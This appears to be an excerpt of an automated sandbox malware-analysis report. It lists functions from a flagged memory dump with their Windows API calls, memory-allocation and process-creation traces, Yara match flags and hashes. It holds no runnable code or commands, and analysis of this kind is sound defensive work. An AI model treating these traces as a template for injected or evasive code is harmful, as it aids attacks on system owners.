                                                                                                                                • Instruction Fuzzy Hash: 96F0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241D630E811CBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE8660, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtReadFile.NTDLL(00CE3D62,5E972F65,FFFFFFFF,00CE3A21,?,?,00CE3D62,?,00CE3A21,FFFFFFFF,5E972F65,00CE3D62,?,00000000), ref: 00CE86A5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                • Instruction ID: 5ccc29e555776ca71a5869bcb25dadd34e47d2cec58b728b2aad355e3d851e39
                                                                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                • Instruction Fuzzy Hash: D2F0B7B2200208AFCB14DF89DC85EEB77ADEF8C754F158248BE1D97251DA30E811CBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE8790, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00CD2D11,00002000,00003000,00000004), ref: 00CE87C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                • Instruction ID: 0d39730c51d87f754f93d1e9c803e5142db51617252e347e08532bdd4b25c4f4
                                                                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                • Instruction Fuzzy Hash: 2CF015B2200208ABCB14DF89CC81EAB77ADEF88750F118148BE0897241C630F810CBE0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE86E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtClose.NTDLL(00CE3D40,?,?,00CE3D40,00000000,FFFFFFFF), ref: 00CE8705
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                • Instruction ID: b5687424744ef8fb97d30b44f6a9f4cfd82db90faeaa37dd8dc2feb2ce28f048
                                                                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                • Instruction Fuzzy Hash: BDD01275200214ABD710EB99CC45E97775DEF44750F154459BA185B242D530F50086E0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F29860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: ba227e552fdd27a99771207d66bbee244cc169ae38ebf1eb93340b53d7fb8d96
                                                                                                                                • Instruction ID: 77f932ce6c92fb63eb1a792efda1effa9b3a2a7b6f7d6cd3d9442b7ea23204cf
                                                                                                                                • Opcode Fuzzy Hash: ba227e552fdd27a99771207d66bbee244cc169ae38ebf1eb93340b53d7fb8d96
                                                                                                                                • Instruction Fuzzy Hash: 7990027125100413F11161594504707000997D06C7F91C412A0416568D9696D963B161
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F29840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 5330455a05fc4f6a2c9a0a480cc7dd05cde62ed82b7bb0937d9f0283c3cd4636
                                                                                                                                • Instruction ID: c71effbb3728fbf850c83d029082f5f52e2e7979be8c8e552ec0b0608fa7a3b2
                                                                                                                                • Opcode Fuzzy Hash: 5330455a05fc4f6a2c9a0a480cc7dd05cde62ed82b7bb0937d9f0283c3cd4636
                                                                                                                                • Instruction Fuzzy Hash: 5E900261292041527545B15944045074006A7E06C7B91C012A1406960C8566E867E661
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: b4fa839cbdad192db6d8753ee6162dea9c7ff96fbf7136b5fa9106e74d0ed907
                                                                                                                                • Instruction ID: 2ffdb559d14a906c16b080007b6181eafe411ab2c5cc6541253f09e61b092ad9
                                                                                                                                • Opcode Fuzzy Hash: b4fa839cbdad192db6d8753ee6162dea9c7ff96fbf7136b5fa9106e74d0ed907
                                                                                                                                • Instruction Fuzzy Hash: 1B9002A125200003610571594414616400A97E0687F51C021E10065A0DC565D8A27165
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: edac698d3ca2989454e1f03d5eaa7bdbb9e9d5ffcf5ce1d9150d93d1acff407a
                                                                                                                                • Instruction ID: c60b8733e2781dcd977154a186210330c38253aacddf2d89bbbacfe1e9c3050e
                                                                                                                                • Opcode Fuzzy Hash: edac698d3ca2989454e1f03d5eaa7bdbb9e9d5ffcf5ce1d9150d93d1acff407a
                                                                                                                                • Instruction Fuzzy Hash: 969002A139100442F10061594414B060005D7E1787F51C015E1056564D8659DC637166
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F29540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: f912428a228ac22eae2e7b3a9641fca4aad84de2b1182bebb2bff7d018b8696c
                                                                                                                                • Instruction ID: 5a2297cf60907ec9ae05ca1a5ddc7dbe0b3f6fa5d8549fdbcb67cacf6709d515
                                                                                                                                • Opcode Fuzzy Hash: f912428a228ac22eae2e7b3a9641fca4aad84de2b1182bebb2bff7d018b8696c
                                                                                                                                • Instruction Fuzzy Hash: F1900265261000032105A5590704507004697D57D7751C021F1007560CD661D8726161
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F29910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: c7aea5453ce3fac4d0b971d153fbd4f4f23fd013763e62be7b99a8ae3d81ad63
                                                                                                                                • Instruction ID: d043c5ac58d7858bf21b5e8adb9717329b54037468c4ce316ab895dc5072387e
                                                                                                                                • Opcode Fuzzy Hash: c7aea5453ce3fac4d0b971d153fbd4f4f23fd013763e62be7b99a8ae3d81ad63
                                                                                                                                • Instruction Fuzzy Hash: 5B9002B125100402F14071594404746000597D0787F51C011A5056564E8699DDE676A5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: e9b93569823a41047abf4f467cfaeb46048a1185bd827a7216f71bcaa8992425
                                                                                                                                • Instruction ID: cbf2e4282667dd40da8760def1c0a67712a29e01e6f2f22b67ad9bb050f6371b
                                                                                                                                • Opcode Fuzzy Hash: e9b93569823a41047abf4f467cfaeb46048a1185bd827a7216f71bcaa8992425
                                                                                                                                • Instruction Fuzzy Hash: C690027125108802F1106159840474A000597D0787F55C411A4416668D86D5D8A27161
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F296D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: f2b2d03f1b0e414b19da7e331ad8e589a695347ae0ae3c9ba59d17df190276b2
                                                                                                                                • Instruction ID: 1907d02734780c76f3086db4fa4d7db3b67cc9376c073efd97c70be67f06cc9f
                                                                                                                                • Opcode Fuzzy Hash: f2b2d03f1b0e414b19da7e331ad8e589a695347ae0ae3c9ba59d17df190276b2
                                                                                                                                • Instruction Fuzzy Hash: FF90027125100842F10061594404B46000597E0787F51C016A0116664D8655D8627561
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F29660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: d0af5105fb74286494d6939acbd2eff9aebc93e85f13510623d669f81a84d0e7
                                                                                                                                • Instruction ID: ad9156178f3062976f779c6d9213719cb150af61871dc72c65c74f365c204f79
                                                                                                                                • Opcode Fuzzy Hash: d0af5105fb74286494d6939acbd2eff9aebc93e85f13510623d669f81a84d0e7
                                                                                                                                • Instruction Fuzzy Hash: 5290027125100802F1807159440464A000597D1787F91C015A0017664DCA55DA6A77E1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F29650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 4bfaafe72edfb19d3d87e3d93011d622417ee2ea2e51b610bc850563b4410b4d
                                                                                                                                • Instruction ID: 0c4548afdcd8acfb29202b76402dfe793bd3f00c53501856ec985610289519e8
                                                                                                                                • Opcode Fuzzy Hash: 4bfaafe72edfb19d3d87e3d93011d622417ee2ea2e51b610bc850563b4410b4d
                                                                                                                                • Instruction Fuzzy Hash: 5590027125504842F14071594404A46001597D078BF51C011A00566A4D9665DD66B6A1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F29A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: b7fc95a57b2c46fd8f26a923d717ca9e6463541294c24bac50f7b4e6ed208717
                                                                                                                                • Instruction ID: 92e121ef4fc2024aff23d1480ef4e5f3b8d911b63f6400c7c6f5305f0b5c7760
                                                                                                                                • Opcode Fuzzy Hash: b7fc95a57b2c46fd8f26a923d717ca9e6463541294c24bac50f7b4e6ed208717
                                                                                                                                • Instruction Fuzzy Hash: 4590026126180042F20065694C14B07000597D0787F51C115A0146564CC955D8726561
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F29FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: bd0e1e3567af8b1739701526b828d53177ea558b158bbf4313afe4c6f1ed53a3
                                                                                                                                • Instruction ID: 70df12e9182d86da3988b78b944f56a8f0f5b19dedc31916a49635d8e7a84b52
                                                                                                                                • Opcode Fuzzy Hash: bd0e1e3567af8b1739701526b828d53177ea558b158bbf4313afe4c6f1ed53a3
                                                                                                                                • Instruction Fuzzy Hash: D290027136114402F11061598404706000597D1687F51C411A0816568D86D5D8A27162
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F29780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 5573f546b50dabf81b1afa4c82f8bbcc944a0d02dc11151af318e8c7e678c783
                                                                                                                                • Instruction ID: 90fa49efa1a37fb84905619dfd1aaeb622718fb9f57cfb94d93ab9b84d3073e7
                                                                                                                                • Opcode Fuzzy Hash: 5573f546b50dabf81b1afa4c82f8bbcc944a0d02dc11151af318e8c7e678c783
                                                                                                                                • Instruction Fuzzy Hash: 3890026926300002F1807159540860A000597D1687F91D415A0007568CC955D87A6361
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F29710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: b860df0a3b06ab5b3b566367981901c0ebeb188ce6cc3856e018aa1ef0641913
                                                                                                                                • Instruction ID: e9af9a96e7a105da33e164f3a54347a4fa01e0a43d99c1331d250974bac65c2d
                                                                                                                                • Opcode Fuzzy Hash: b860df0a3b06ab5b3b566367981901c0ebeb188ce6cc3856e018aa1ef0641913
                                                                                                                                • Instruction Fuzzy Hash: 8090027125100402F10065995408646000597E0787F51D011A5016565EC6A5D8A27171
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE72C6, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 81sleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 00CE7378
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID: net.dll$wininet.dll${
                                                                                                                                • API String ID: 3472027048-1939573249
                                                                                                                                • Opcode ID: 9db4ac67f354a2f124110804c2eadd0978e040e8774f3ef532098b77fc384710
                                                                                                                                • Instruction ID: 114d8f112c8ae522910adc386e36785a764019abac2969a459edf3472a1ccf22
                                                                                                                                • Opcode Fuzzy Hash: 9db4ac67f354a2f124110804c2eadd0978e040e8774f3ef532098b77fc384710
                                                                                                                                • Instruction Fuzzy Hash: 7F31F2B1505380ABC710DF69C8A1F6BB7B8EF48700F148119FA199B241D774B945DBE0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE72D0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 00CE7378
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                • Opcode ID: e41a815766f3f25b52915bc3bae526404cd8ecc300f88e544bfdd51206af5907
                                                                                                                                • Instruction ID: bbc4376a3517908529b1df49b9db46968e854b6576ac6f762912b87d040b1907
                                                                                                                                • Opcode Fuzzy Hash: e41a815766f3f25b52915bc3bae526404cd8ecc300f88e544bfdd51206af5907
                                                                                                                                • Instruction Fuzzy Hash: 4B319EB6605740ABC725DF69D8A1FABB7B8EF48700F00811DFA5A9B241D730B945DBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE88B4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00CD3B93), ref: 00CE88ED
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID: .z`
                                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                                • Opcode ID: 236ac833b0e9f6d3b598911935da7d224abf60ed6c32ea652c73d1b9567f1b91
                                                                                                                                • Instruction ID: 7c1f246bcc0c56b05abdcad959e90799b0e0c75faa2cd849550b912738e54f22
                                                                                                                                • Opcode Fuzzy Hash: 236ac833b0e9f6d3b598911935da7d224abf60ed6c32ea652c73d1b9567f1b91
                                                                                                                                • Instruction Fuzzy Hash: 28E06DB1200219ABD715DF65CC09EA7775DEF49700F014299F9085B252C631E915CBF1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE88C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00CD3B93), ref: 00CE88ED
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID: .z`
                                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                • Instruction ID: ece7105acbc30e66064ee234a33b4e701b5f1dc4d7a27ad54ec02e142401e68e
                                                                                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                • Instruction Fuzzy Hash: 03E04FB1200204ABD714DF59CC49EA777ADEF88750F014558FE0857351D630F910CAF0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CD7280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00CD72DA
                                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00CD72FB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                • Opcode ID: 88f562c184ae37d093af23ba06a366c5bb95a27bdb7d34895bc7096f1526536c
                                                                                                                                • Instruction ID: f95e274e86e73cc14392ec6df5e0a4198d6f9b10737d1ca5d6a05be5c0e1c158
                                                                                                                                • Opcode Fuzzy Hash: 88f562c184ae37d093af23ba06a366c5bb95a27bdb7d34895bc7096f1526536c
                                                                                                                                • Instruction Fuzzy Hash: 5D01A731A802687BE721A6959C03FBE776C9B00F50F150119FF04BA2C1E6A47A0546F6
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CE88F2, Relevance: 3.0, APIs: 2, Instructions: 45processmemoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00CD3B93), ref: 00CE88ED
                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00CE8984
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFreeHeapInternalProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1438695366-0
                                                                                                                                • Opcode ID: dafc8c15e8a9e2114bf0b2238d302474ce2a3dc609ada96c66e59e2f03f3d90a
                                                                                                                                • Instruction ID: 2ac600ff0e1e3b946c2616c674bee651aa4dbd087980d23b57ae9a4d71727c66
                                                                                                                                • Opcode Fuzzy Hash: dafc8c15e8a9e2114bf0b2238d302474ce2a3dc609ada96c66e59e2f03f3d90a
                                                                                                                                • Instruction Fuzzy Hash: 4BF037B2204448ABDB04CFA9EC80CFBB7ADEF8C2547248749F94C97148C630E8568BA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00CD9B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00CD9BA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                                                                                • Instruction ID: 425ee205697a1cd7654d14629d3af7e1fcdb8b3762139a786810a92aa0b0b16f
